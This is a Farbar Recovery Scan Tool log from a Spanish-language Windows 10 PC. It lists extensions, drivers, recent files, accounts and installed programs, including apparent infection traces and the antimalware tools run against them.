CHR Extension: (Spotify - Music for every moment) - C:\Users\Alfredo y Diego\AppData\Local\Google\Chrome\User Data\Default\Extensions\cnkjkdjlofllcpbemipjbcpfnglbgieh [2018-07-19]
CHR Extension: (User-Agent Switcher for Chrome) - C:\Users\Alfredo y Diego\AppData\Local\Google\Chrome\User Data\Default\Extensions\djflhoibgkdhkhhcedjiklpkjnoahfmg [2019-11-23]
CHR Extension: (Hojas de cálculo) - C:\Users\Alfredo y Diego\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2018-07-19]
CHR Extension: (Nano Adblocker) - C:\Users\Alfredo y Diego\AppData\Local\Google\Chrome\User Data\Default\Extensions\gabbbocakeomblphkmmnoamkioajlkfo [2019-11-10]
CHR Extension: (Documentos de Google sin conexión) - C:\Users\Alfredo y Diego\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2018-08-15]
CHR Extension: (Hola Free VPN Proxy Unblocker) - C:\Users\Alfredo y Diego\AppData\Local\Google\Chrome\User Data\Default\Extensions\gkojfkhlekighikafcpjkiklfbnlmeio [2019-11-19]
CHR Extension: (uVPN - Gratis e ilimitada VPN para todos) - C:\Users\Alfredo y Diego\AppData\Local\Google\Chrome\User Data\Default\Extensions\gpieacagdjdfbifodokiccinpbacemjf [2019-11-12]
CHR Extension: (TweetDeck by Twitter) - C:\Users\Alfredo y Diego\AppData\Local\Google\Chrome\User Data\Default\Extensions\hbdpomandigafcibbmofojjchbcdagbl [2018-07-19]
CHR Extension: (Web Scrobbler) - C:\Users\Alfredo y Diego\AppData\Local\Google\Chrome\User Data\Default\Extensions\hhinaapppaileiechjoiifaancjggfjm [2019-11-16]
CHR Extension: (Asora) - C:\Users\Alfredo y Diego\AppData\Local\Google\Chrome\User Data\Default\Extensions\jfomjghdcjmkkmjpmdiimfllafbmpack [2018-08-12]
CHR Extension: (Ayudante de Tramites) - C:\Users\Alfredo y Diego\AppData\Local\Google\Chrome\User Data\Default\Extensions\jmpbfgcgdhmhloabdbnjcbghceicelpb [2019-11-06]
CHR Extension: (mobile browser emulator) - C:\Users\Alfredo y Diego\AppData\Local\Google\Chrome\User Data\Default\Extensions\lbofcampnkjmiomohpbaihdcbjhbfepf [2018-07-19]
CHR Extension: (Captura de página completa - FireShot) - C:\Users\Alfredo y Diego\AppData\Local\Google\Chrome\User Data\Default\Extensions\mcbpblocgmgfnpjjppndjkmgjaogfceg [2019-07-07]
CHR Extension: (Sistema de pagos de Chrome Web Store) - C:\Users\Alfredo y Diego\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2019-11-06]
CHR Extension: (TunnelBear VPN) - C:\Users\Alfredo y Diego\AppData\Local\Google\Chrome\User Data\Default\Extensions\omdakjcmkglenbhjadbccaookpfjihpa [2019-08-09]
CHR Extension: (Gmail) - C:\Users\Alfredo y Diego\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2019-06-26]
CHR Extension: (Chrome Media Router) - C:\Users\Alfredo y Diego\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2019-11-06]
CHR HKU\S-1-5-21-1270689601-2402022770-626450427-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [ijahobfejgeblmkpcmgpelfibgnnjpil]
CHR HKU\S-1-5-21-1270689601-2402022770-626450427-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [pilplloabdedfmialnfchjomjmpjcoej]

==================== Services (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 MBAMService; C:\Program Files\Malwarebytes\Anti-Malware\mbamservice.exe [5570712 2019-11-23] (Malwarebytes Inc -> Malwarebytes)

===================== Drivers (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

S3 bcmfn; C:\Windows\System32\drivers\bcmfn.sys [8192 2016-07-16] (Microsoft Windows -> Windows (R) Win 7 DDK provider)
R1 HWiNFO32; C:\Windows\system32\drivers\HWiNFO32.SYS [23840 2018-07-19] (Martin Malik - REALiX -> REALiX(tm))
R2 MBAMChameleon; C:\Windows\System32\Drivers\MbamChameleon.sys [183048 2019-11-23] (Malwarebytes Inc -> Malwarebytes)
S0 MbamElam; C:\Windows\System32\DRIVERS\MbamElam.sys [17352 2019-11-23] (Microsoft Windows Early Launch Anti-malware Publisher -> Malwarebytes)
R3 MBAMSwissArmy; C:\Windows\System32\Drivers\mbamswissarmy.sys [243800 2019-11-24] (Malwarebytes Inc -> Malwarebytes)
S3 NetAdapterCx; C:\Windows\System32\drivers\NetAdapterCx.sys [62976 2016-07-16] (Microsoft Windows -> )
R3 rt640x86; C:\Windows\System32\drivers\rt640x86.sys [984264 2019-11-05] (Realtek Semiconductor Corp. -> Realtek )
U3 TrueSight; C:\Windows\System32\drivers\truesight.sys [24688 2019-11-22] (Adlice -> )
R0 trufos; C:\Windows\System32\drivers\trufos.sys [522240 2018-06-28] (Bitdefender SRL -> Bitdefender)
S3 UrsSynopsys; C:\Windows\System32\drivers\urssynopsys.sys [21856 2016-07-16] (Microsoft Windows -> Microsoft Corporation)
S3 wdm_usb; C:\Windows\system32\DRIVERS\usb2ser.sys [119952 2016-07-15] (NGO -> MBB)
R3 wovad_micarray; C:\Windows\system32\drivers\womic.sys [29752 2018-05-13] (Microsoft Windows Hardware Compatibility Publisher -> Windows (R) Win 7 DDK provider)
S3 WUDFWpdMtp; C:\Windows\system32\DRIVERS\WUDFRd.sys [161280 2016-07-16] (Microsoft Windows -> Microsoft Corporation)
U4 dcpsvc; no ImagePath
U4 DiagTrack; no ImagePath

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One month (created) ===================

(If an entry is included in the fixlist, the file/folder will be moved.)

Error(1) reading file: "C:\Users\Alfredo y Diego\Downloads\Webroot SecureAnywhere AntiVirus 9.0.24.49 "
2019-11-24 07:42 - 2019-11-24 07:44 - 000000000 ____D C:\Users\Alfredo y Diego\AppData\LocalLow\IGDump
2019-11-24 07:41 - 2019-11-24 07:43 - 000019555 _____ C:\Users\Alfredo y Diego\Downloads\FRST.txt
2019-11-24 07:35 - 2019-11-24 07:42 - 000000000 ____D C:\FRST
2019-11-24 07:31 - 2019-11-24 07:31 - 001990144 _____ (Farbar) C:\Users\Alfredo y Diego\Downloads\FRST.exe
2019-11-24 07:24 - 2019-11-24 07:24 - 000243800 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbamswissarmy.sys
2019-11-23 22:39 - 2019-11-23 22:39 - 000002659 _____ C:\Users\Alfredo y Diego\Desktop\x.txt
2019-11-23 22:33 - 2019-11-23 22:35 - 000000000 ____D C:\AdwCleaner
2019-11-23 22:32 - 2019-11-23 22:32 - 007622344 _____ (Malwarebytes) C:\Users\Alfredo y Diego\Downloads\adwcleaner_7.4.2.exe
2019-11-23 21:48 - 2019-11-23 21:48 - 000000000 ____D C:\Users\Alfredo y Diego\AppData\Local\cache
2019-11-23 21:47 - 2019-11-23 21:47 - 000183048 _____ (Malwarebytes) C:\Windows\system32\Drivers\MbamChameleon.sys
2019-11-23 21:25 - 2019-11-23 21:25 - 000001009 _____ C:\Users\Alfredo y Diego\Downloads\PCASTLE-malware-removal-script-master.zip
2019-11-23 14:26 - 2019-11-23 22:26 - 000004463 _____ C:\Users\Alfredo y Diego\Desktop\xx.txt
2019-11-23 10:10 - 2019-11-23 10:10 - 000152920 _____ C:\Users\Alfredo y Diego\Documents\cc_20191123_101022.reg
2019-11-23 09:52 - 2019-11-23 09:52 - 000000000 ____D C:\Users\Alfredo y Diego\AppData\Local\mbamtray
2019-11-23 09:52 - 2019-11-23 09:52 - 000000000 ____D C:\Users\Alfredo y Diego\AppData\Local\mbam
2019-11-23 09:51 - 2019-11-23 21:48 - 000002035 _____ C:\Users\Public\Desktop\Malwarebytes.lnk
2019-11-23 09:51 - 2019-11-23 21:45 - 000129056 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbae.sys
2019-11-23 09:51 - 2019-11-23 21:45 - 000017352 _____ (Malwarebytes) C:\Windows\system32\Drivers\MbamElam.sys
2019-11-23 09:51 - 2019-11-23 09:51 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes
2019-11-23 09:51 - 2019-11-23 09:51 - 000000000 ____D C:\ProgramData\Malwarebytes
2019-11-23 09:51 - 2019-11-23 09:51 - 000000000 ____D C:\Program Files\Malwarebytes
2019-11-23 09:49 - 2019-11-23 09:49 - 000000000 ____D C:\Users\Alfredo y Diego\AppData\Roaming\Obsidium
2019-11-23 09:44 - 2019-11-23 09:47 - 064941265 _____ C:\Users\Alfredo y Diego\Downloads\KYMBIT38.rar
2019-11-22 22:52 - 2019-11-23 09:51 - 000000000 ____D C:\Windows\ELAMBKUP
2019-11-22 22:52 - 2019-11-22 22:52 - 000000000 ____H C:\Windows\system32\Drivers\Msft_Kernel_avusbflt_01011.Wdf
2019-11-22 21:43 - 2019-11-22 21:43 - 000222648 _____ (Malwarebytes) C:\Windows\system32\Drivers\6457D54B.sys
2019-11-22 21:42 - 2019-11-22 23:12 - 000000000 ____D C:\ProgramData\Malwarebytes' Anti-Malware (portable)
2019-11-22 21:41 - 2019-11-22 22:23 - 000000000 ____D C:\Users\Alfredo y Diego\Desktop\mbar
2019-11-22 20:19 - 2019-11-22 20:19 - 000024688 _____ C:\Windows\system32\Drivers\truesight.sys
2019-11-22 20:06 - 2019-11-22 20:07 - 000213182 _____ C:\TDSSKiller.3.1.0.28_22.11.2019_20.06.33_log.txt
2019-11-22 19:56 - 2019-11-22 19:57 - 000213182 _____ C:\TDSSKiller.3.1.0.28_22.11.2019_19.56.35_log.txt
2019-11-22 19:53 - 2019-11-22 19:53 - 000000000 ____D C:\TDSSKiller_Quarantine
2019-11-22 19:52 - 2019-11-22 19:54 - 000220608 _____ C:\TDSSKiller.3.1.0.28_22.11.2019_19.52.02_log.txt
2019-11-22 19:50 - 2019-11-22 19:51 - 005054744 _____ (AO Kaspersky Lab) C:\Users\Alfredo y Diego\Downloads\tdsskiller.exe
2019-11-22 19:44 - 2019-11-22 19:44 - 000000000 ___HD C:\$SysReset
2019-11-22 19:22 - 2019-11-22 19:35 - 001120256 ____H (Microsoft® Windows® Operating System) C:\Windows\system32\Drivers\taskmgr.exe
2019-11-22 16:56 - 2019-11-22 16:56 - 000066232 _____ C:\ProgramData\agent.uninstall.1574456184.bdinstall.v2.bin
2019-11-22 06:54 - 2019-11-22 06:54 - 000004294 _____ C:\Windows\system32\Tasks\Opera scheduled Autoupdate 1533575745
2019-11-22 06:54 - 2019-11-22 06:54 - 000001419 _____ C:\Users\Alfredo y Diego\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Navegador Opera.lnk
2019-11-21 07:33 - 2019-11-21 19:53 - 000000000 ____D C:\Users\Alfredo y Diego\Downloads\Películas
2019-11-20 22:12 - 2019-11-21 11:57 - 000000477 _____ C:\Users\Alfredo y Diego\Desktop\Infravalorado.txt
2019-11-17 00:07 - 2019-11-17 00:07 - 000342329 _____ C:\Users\Alfredo y Diego\AppData\Roaming\Pofad
2019-11-16 01:54 - 2019-11-23 14:52 - 000002472 _____ C:\Windows\system32\Tasks\{2A3E5AA4-AD05-45CD-A693-C23160DA1F7B}
2019-11-16 01:48 - 2019-04-15 08:13 - 002856624 _____ (Realtek Semiconductor Corp.) C:\Windows\RtlExUpd.dll
2019-11-15 15:15 - 2019-11-15 15:15 - 000000491 _____ C:\Users\Alfredo y Diego\Downloads\UTC--2019-11-15T19-15-14.896Z--020b87a3590792fc2f5f4b1322adae4fff4b12e4
2019-11-14 09:32 - 2019-11-14 09:32 - 000000000 ____D C:\Users\Alfredo y Diego\Downloads\The.Mandalorian.S01.1080p.LakeFilms
2019-11-10 16:05 - 2019-11-16 21:40 - 000000000 ___HD C:\Program Files\Temp
2019-11-10 16:05 - 2019-11-10 16:05 - 000000000 ___HD C:\Program Files\InstallShield Installation Information
2019-11-10 10:42 - 2019-11-15 07:57 - 000000000 ____D C:\Users\Alfredo y Diego\Desktop\uTorrent
2019-11-09 14:32 - 2019-11-09 14:32 - 000000000 ____D C:\ProgramData\Mozilla
2019-11-07 11:39 - 2019-11-09 07:45 - 000000000 ____D C:\Users\Alfredo y Diego\Documents\Lightshot
2019-11-06 17:22 - 2019-11-06 17:32 - 365981740 _____ C:\Users\Alfredo y Diego\Downloads\2015.zip
2019-11-06 06:04 - 2019-11-23 20:27 - 000000428 _____ C:\Windows\Tasks\update-sys.job
2019-11-06 06:04 - 2019-11-23 20:27 - 000000428 _____ C:\Windows\Tasks\update-S-1-5-21-1270689601-2402022770-626450427-1001.job
2019-11-06 06:04 - 2019-11-23 14:50 - 000003120 _____ C:\Windows\system32\Tasks\update-S-1-5-21-1270689601-2402022770-626450427-1001
2019-11-06 06:04 - 2019-11-23 14:50 - 000002868 _____ C:\Windows\system32\Tasks\update-sys
2019-11-06 06:04 - 2019-11-06 06:04 - 000000412 _____ C:\Users\Alfredo y Diego\AppData\Local\UserProducts.xml
2019-11-06 06:03 - 2019-11-06 06:03 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Lightshot
2019-11-06 06:03 - 2019-11-06 06:03 - 000000000 ____D C:\Program Files\Skillbrains
2019-11-06 00:07 - 2019-11-06 00:07 - 000147253 _____ C:\Users\Alfredo y Diego\AppData\Roaming\Kekugopom
2019-11-05 21:10 - 2019-11-05 21:10 - 000984264 _____ (Realtek ) C:\Windows\system32\Drivers\rt640x86.sys
2019-11-05 21:05 - 2019-11-05 21:05 - 000073764 _____ C:\ProgramData\agent.update.1573002209.bdinstall.v2.bin

==================== One month (modified) ==================

(If an entry is included in the fixlist, the file/folder will be moved.)

2019-11-24 07:26 - 2018-11-12 00:35 - 000000000 ____D C:\Users\Alfredo y Diego\AppData\Roaming\Telegram Desktop
2019-11-24 07:24 - 2018-07-19 01:38 - 000000006 ____H C:\Windows\Tasks\SA.DAT
2019-11-23 23:53 - 2018-07-19 01:48 - 000000000 ____D C:\Users\Alfredo y Diego\AppData\Local\ClassicShell
2019-11-23 22:48 - 2018-12-26 23:38 - 000002071 _____ C:\Users\Alfredo y Diego\Desktop\FL Studio 12 (32bit).lnk
2019-11-23 22:48 - 2018-12-03 14:21 - 000001052 _____ C:\Users\Alfredo y Diego\Desktop\HandBrake.lnk
2019-11-23 22:48 - 2018-10-14 18:47 - 000001032 _____ C:\Users\Alfredo y Diego\Desktop\WO Mic Client.lnk
2019-11-23 22:48 - 2018-08-31 08:01 - 000002536 _____ C:\Users\Alfredo y Diego\Desktop\BitShares.lnk
2019-11-23 22:48 - 2018-08-24 01:46 - 000001161 _____ C:\Users\Alfredo y Diego\Desktop\MEGAsync.lnk
2019-11-23 22:48 - 2018-08-12 22:37 - 000001199 _____ C:\Users\Alfredo y Diego\Desktop\PotPlayer.lnk
2019-11-23 22:48 - 2018-08-06 13:15 - 000001400 _____ C:\Users\Alfredo y Diego\Desktop\Navegador Opera.lnk
2019-11-23 22:48 - 2018-07-19 03:27 - 000002023 _____ C:\Users\Alfredo y Diego\Desktop\CrystalDiskInfo.lnk
2019-11-23 22:41 - 2018-08-22 17:18 - 000000000 ____D C:\Users\Alfredo y Diego\AppData\Roaming\BitTorrent
2019-11-23 22:35 - 2018-07-19 02:02 - 000000000 ____D C:\Users\Alfredo y Diego\AppData\Roaming\IObit
2019-11-23 22:35 - 2018-07-19 02:02 - 000000000 ____D C:\ProgramData\IObit
2019-11-23 22:23 - 2018-11-11 20:10 - 000000000 ____D C:\Users\Alfredo y Diego\Downloads\Telegram Desktop
2019-11-23 22:17 - 2018-07-19 01:35 - 000000000 ____D C:\Windows\system32\SleepStudy
2019-11-23 20:36 - 2018-11-10 23:44 - 000004210 _____ C:\Windows\system32\Tasks\CCleaner Update
2019-11-23 20:25 - 2018-07-19 01:45 - 000000000 ____D C:\Users\Alfredo y Diego
2019-11-23 14:50 - 2018-11-10 23:44 - 000002278 _____ C:\Windows\system32\Tasks\CCleanerSkipUAC
2019-11-23 09:35 - 2018-08-15 13:48 - 000000000 ____D C:\ProgramData\Package Cache
2019-11-23 02:50 - 2018-11-10 22:07 - 000000000 ____D C:\ProgramData\{2F4FEA2C-A50D-60EA-23CB-FEA8B9897566}
2019-11-22 22:23 - 2018-11-10 22:07 - 000000000 ____D C:\Users\Alfredo y Diego\AppData\Local\Dekitim
2019-11-22 19:03 - 2018-09-23 16:32 - 000000000 ___RD C:\Windows\MiracastView
2019-11-22 17:42 - 2018-08-13 14:27 - 000000000 ____D C:\Users\Alfredo y Diego\AppData\Local\ElevatedDiagnostics
2019-11-22 16:55 - 2018-11-10 23:43 - 000000000 ____D C:\Program Files\CCleaner
2019-11-22 16:49 - 2018-07-19 02:04 - 000000000 ____D C:\ProgramData\ProductData
2019-11-22 15:40 - 2016-07-16 04:28 - 000000000 ____D C:\Windows\INF
2019-11-21 18:23 - 2018-07-19 02:28 - 000002253 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2019-11-21 18:23 - 2018-07-19 02:28 - 000002212 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2019-11-21 10:07 - 2018-07-19 02:37 - 000000000 ____D C:\Users\Alfredo y Diego\AppData\Roaming\foobar2000
2019-11-20 11:44 - 2016-07-15 22:22 - 000008192 _____ C:\Windows\system32\config\BBI
2019-11-18 10:05 - 2018-08-29 19:15 - 000000000 ____D C:\Users\Alfredo y Diego\Desktop\mkvtoolnix
2019-11-18 00:07 - 2018-11-11 00:07 - 000000425 _____ C:\Users\Alfredo y Diego\AppData\Roaming\WB.CFG
2019-11-16 17:16 - 2018-07-19 02:03 - 000000000 ____D C:\Users\Alfredo y Diego\AppData\LocalLow\Mozilla
2019-11-12 23:09 - 2018-07-19 02:33 - 000000000 ____D C:\Windows\system32\RTCOM
2019-11-10 07:34 - 2016-07-16 04:29 - 000000000 ____D C:\Windows\system32\FxsTmp
2019-11-10 04:32 - 2018-09-27 20:24 - 000000000 ____D C:\Windows\pss
2019-11-09 16:42 - 2018-07-19 02:02 - 000000000 ____D C:\Program Files\Mozilla Maintenance Service
2019-11-09 16:42 - 2018-07-19 02:02 - 000000000 ____D C:\Program Files\Mozilla Firefox
2019-11-09 14:32 - 2018-07-19 02:02 - 000001198 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Firefox.lnk
2019-11-06 10:02 - 2018-07-19 01:45 - 000000000 __RHD C:\Users\Public\AccountPictures
2019-11-05 21:22 - 2018-07-19 02:28 - 000003546 _____ C:\Windows\system32\Tasks\GoogleUpdateTaskMachineUA
2019-11-05 21:22 - 2018-07-19 02:28 - 000003422 _____ C:\Windows\system32\Tasks\GoogleUpdateTaskMachineCore
2019-11-05 21:20 - 2018-07-19 02:28 - 000000000 ____D C:\Program Files\Google

==================== Files in the root of some directories ========

2019-11-06 00:07 - 2019-11-06 00:07 - 000147253 _____ () C:\Users\Alfredo y Diego\AppData\Roaming\Kekugopom
2019-11-17 00:07 - 2019-11-17 00:07 - 000342329 _____ () C:\Users\Alfredo y Diego\AppData\Roaming\Pofad
2019-07-29 02:05 - 2019-07-29 02:05 - 000361684 _____ () C:\Users\Alfredo y Diego\AppData\Roaming\Tapufeha
2018-11-11 00:07 - 2019-11-18 00:07 - 000000425 _____ () C:\Users\Alfredo y Diego\AppData\Roaming\WB.CFG
2018-07-20 06:06 - 2018-07-20 06:06 - 000007601 _____ () C:\Users\Alfredo y Diego\AppData\Local\Resmon.ResmonCfg
2019-11-06 06:04 - 2019-11-06 06:04 - 000000003 _____ () C:\Users\Alfredo y Diego\AppData\Local\updater.log
2019-11-06 06:04 - 2019-11-06 06:04 - 000000412 _____ () C:\Users\Alfredo y Diego\AppData\Local\UserProducts.xml

==================== SigCheck ============================

(There is no automatic fix for files that do not pass verification.)


LastRegBack: 2019-11-22 07:07
==================== End of FRST.txt ========================
Additional scan result of Farbar Recovery Scan Tool (x86) Version: 23-11-2019
Ran by Alfredo y Diego (24-11-2019 07:44:47)
Running from C:\Users\Alfredo y Diego\Downloads
Microsoft Windows 10 Enterprise 2016 LTSB Version 1607 (X86) (2018-07-19 05:44:33)
Boot Mode: Normal
==========================================================


==================== Accounts: =============================

Administrador (S-1-5-21-1270689601-2402022770-626450427-500 - Administrator - Disabled)
Alfredo y Diego (S-1-5-21-1270689601-2402022770-626450427-1001 - Administrator - Enabled) => C:\Users\Alfredo y Diego
DefaultAccount (S-1-5-21-1270689601-2402022770-626450427-503 - Limited - Disabled)
defaultuser0 (S-1-5-21-1270689601-2402022770-626450427-1000 - Limited - Disabled) => C:\Users\defaultuser0
Invitado (S-1-5-21-1270689601-2402022770-626450427-501 - Limited - Enabled)

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)


==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

Adobe Flash Player 30 PPAPI (HKLM\...\Adobe Flash Player PPAPI) (Version: 30.0.0.154 - Adobe Systems Incorporated)
Adobe Flash Player 31 NPAPI (HKLM\...\Adobe Flash Player NPAPI) (Version: 31.0.0.108 - Adobe Systems Incorporated)
ASIO4ALL (HKLM\...\ASIO4ALL) (Version: 2.12 - Michael Tippach)
BitShares 2.0.180815 (HKU\S-1-5-21-1270689601-2402022770-626450427-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-11242019072625010\...\55efd047-5d18-54f5-be19-affeff8cc8e9) (Version: 2.0.180815 - Sigve Kvalsvik)
BitShares 2.0.180815 (HKU\S-1-5-21-1270689601-2402022770-626450427-1001\...\55efd047-5d18-54f5-be19-affeff8cc8e9) (Version: 2.0.180815 - Sigve Kvalsvik)
BitTorrent (HKU\S-1-5-21-1270689601-2402022770-626450427-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-11242019072625010\...\BitTorrent) (Version: 7.10.5.45272 - BitTorrent Inc.)
BitTorrent (HKU\S-1-5-21-1270689601-2402022770-626450427-1001\...\BitTorrent) (Version: 7.10.5.45374 - BitTorrent Inc.)
Byteball version 2.4.1 (HKLM\...\Byteball_is1) (Version: 2.4.1 - Byteball)
CCleaner (HKLM\...\CCleaner) (Version: 5.48 - Piriform)
Classic Shell (HKLM\...\{8A99142D-5D6E-40B6-AF88-8BD46F0C5CB4}) (Version: 4.3.1 - IvoSoft)
CrystalDiskInfo 7.6.1 (HKLM\...\CrystalDiskInfo_is1) (Version: 7.6.1 - Crystal Dew World)
Eines de correcció del Microsoft Office 2016: català (HKLM\...\{90160000-001F-0403-0000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Ferramentas de verificación de Microsoft Office 2016 - Galego (HKLM\...\{90160000-001F-0456-0000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
FL Studio 12 (HKLM\...\FL Studio 12) (Version:  - Image-Line)
FL Studio ASIO (HKLM\...\FL Studio ASIO) (Version:  - Image-Line)
foobar2000 v1.3.19 (HKLM\...\foobar2000) (Version: 1.3.19 - Peter Pawlowski)
Google Chrome (HKLM\...\Google Chrome) (Version: 78.0.3904.108 - Google LLC)
Google Update Helper (HKLM\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.35.341 - Google LLC) Hidden
HandBrake 1.0.7 (HKLM\...\HandBrake) (Version: 1.0.7 - )
Herramientas de corrección de Microsoft Office 2016: español (HKLM\...\{90160000-001F-0C0A-0000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
IL Download Manager (HKLM\...\IL Download Manager) (Version:  - Image-Line)
Intel(R) Graphics Media Accelerator Driver (HKLM\...\HDMI) (Version: 8.15.10.1930 - Intel Corporation)
Lightshot-5.5.0.4 (HKLM\...\{30A5B3C9-2084-4063-A32A-628A98DE512B}_is1) (Version: 5.5.0.4 - Skillbrains)
Malwarebytes version 4.0.4.49 (HKLM\...\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 4.0.4.49 - Malwarebytes)
MEGAsync (HKLM\...\MEGAsync) (Version:  - Mega Limited)
Microsoft Office Professional Plus 2016 (HKLM\...\Office16.PROPLUS) (Version: 16.0.4266.1001 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.21005 (HKLM\...\{ce085a78-074e-4823-8dc1-8a721b94b76d}) (Version: 12.0.21005.1 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.40649 (HKLM\...\{35b83883-40fa-423c-ae73-2aff7e1ea820}) (Version: 12.0.40649.5 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24210 (HKLM\...\{23658c02-145e-483d-ba6b-1eb82c580529}) (Version: 14.0.24210.0 - Microsoft Corporation)
Mozilla Firefox 68.2.0 ESR (x86 es-ES) (HKLM\...\Mozilla Firefox 68.2.0 ESR (x86 es-ES)) (Version: 68.2.0 - Mozilla)
Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 68.2.0.7228 - Mozilla)
Native Instruments Massive (HKLM\...\Native Instruments Massive) (Version: 1.5.1.637 - Native Instruments)
Opera Stable 64.0.3417.92 (HKU\S-1-5-21-1270689601-2402022770-626450427-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-11242019072625010\...\Opera 64.0.3417.92) (Version: 64.0.3417.92 - Opera Software)
Opera Stable 65.0.3467.48 (HKU\S-1-5-21-1270689601-2402022770-626450427-1001\...\Opera 65.0.3467.48) (Version: 65.0.3467.48 - Opera Software)
PotPlayer (HKLM\...\PotPlayer) (Version: 1.7.13622 - Kakao Corp.)
Realtek High Definition Audio Driver (HKLM\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.8409 - Realtek Semiconductor Corp.)
Revisores de Texto do Microsoft Office 2016 – Português (Brasil) (HKLM\...\{90160000-001F-0416-0000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Sophos Home (HKLM\...\Sophos Endpoint Agent) (Version: 1.3.3 - Sophos Limited)
SoulseekQt versión 2017.2.20 (HKLM\...\{8A4E1646-488C-4E5B-AC31-F784400E8D2D}_is1) (Version: 2017.2.20 - Soulseek LLC)
Telegram Desktop version 1.8.15 (HKU\S-1-5-21-1270689601-2402022770-626450427-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-11242019072625010\...\{53F49750-6209-4FBF-9CA8-7A333C87D1ED}_is1) (Version: 1.8.15 - Telegram FZ-LLC)
Telegram Desktop version 1.8.15 (HKU\S-1-5-21-1270689601-2402022770-626450427-1001\...\{53F49750-6209-4FBF-9CA8-7A333C87D1ED}_is1) (Version: 1.8.15 - Telegram FZ-LLC)
VLC media player (HKLM\...\VLC media player) (Version: 3.0.4 - VideoLAN)
Warcraft III: All Products (HKU\S-1-5-21-1270689601-2402022770-626450427-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-11242019072625010\...\Warcraft III) (Version:  - )
Warcraft III: All Products (HKU\S-1-5-21-1270689601-2402022770-626450427-1001\...\Warcraft III) (Version:  - )
WinRAR 5.50 (32-bit) (HKLM\...\WinRAR archiver) (Version: 5.50.0 - win.rar GmbH)
WO Mic Client (HKLM\...\WOMic) (Version:  - )

==================== Custom CLSID (Whitelisted): ==============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

CustomCLSID: HKU\S-1-5-21-1270689601-2402022770-626450427-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-11242019072625010_Classes\CLSID\{E7629152-0A34-4487-B787-5D1144304455}\localserver32 -> C:\Users\Alfredo y Diego\AppData\Local\Programs\Opera\64.0.3417.92\notification_helper.exe (Opera Software AS -> The Chromium Authors)
CustomCLSID: HKU\S-1-5-21-1270689601-2402022770-626450427-1001_Classes\CLSID\{E7629152-0A34-4487-B787-5D1144304455}\localserver32 -> C:\Users\Alfredo y Diego\AppData\Local\Programs\Opera\65.0.3467.48\notification_helper.exe (Opera Software AS -> The Chromium Authors)
ShellServiceObjects: No Name -> {872f8dc8-dde4-43bd-ac7a-e3d9fe86ceac} => 
ShellServiceObjects: No Name -> {900c0763-5cad-4a34-bc1f-40cd513679d5} => 
ShellIconOverlayIdentifiers: [ MEGA (Pending)] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => C:\Users\Alfredo y Diego\AppData\Local\MEGAsync\ShellExtX32.dll [2017-10-18] () [File not signed]
ShellIconOverlayIdentifiers: [ MEGA (Synced)] -> {05B38830-F4E9-4329-978B-1DD28605D202} => C:\Users\Alfredo y Diego\AppData\Local\MEGAsync\ShellExtX32.dll [2017-10-18] () [File not signed]
ShellIconOverlayIdentifiers: [ MEGA (Syncing)] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => C:\Users\Alfredo y Diego\AppData\Local\MEGAsync\ShellExtX32.dll [2017-10-18] () [File not signed]
